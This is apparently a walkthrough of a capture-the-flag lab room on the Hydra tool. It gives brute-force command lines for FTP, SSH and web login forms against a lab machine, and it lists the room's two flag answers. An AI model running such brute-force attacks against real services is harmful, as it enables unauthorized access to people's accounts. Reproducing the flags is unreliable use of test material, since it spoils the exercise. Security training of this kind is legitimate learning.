Hydra

Hiteshverma
Mar 2, 2024


Task 1: Hydra Introduction

Hydra is an online password-cracking tool that brute-forces logins against live network services.

Task 2: Using Hydra

  • Use Hydra for brute force attacks on services such as FTP and SSH.
  • FTP Command: hydra -l user -P passlist.txt ftp://MACHINE_IP
  • SSH Command: hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh
  • -l: SSH username
  • -P: List of passwords
  • -t: Number of threads
  • Hydra can also brute force web forms.
  • Command for POST Web Form: sudo hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"
  • -l: Username for web form login
  • -P: Password list
  • http-post-form: Form type is POST
  • <path>: Login page URL
  • <login_credentials>: Username and password for login
  • <invalid_response>: Part of response when login fails
  • -V: Verbose output for each attempt
  • Example Command for POST Web Form: hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

Use Hydra to bruteforce molly’s web password. What is flag 1?

Ans: THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to bruteforce molly’s SSH password. What is flag 2?

Ans: THM{c8eeb0468febbadea859baeb33b2541b}
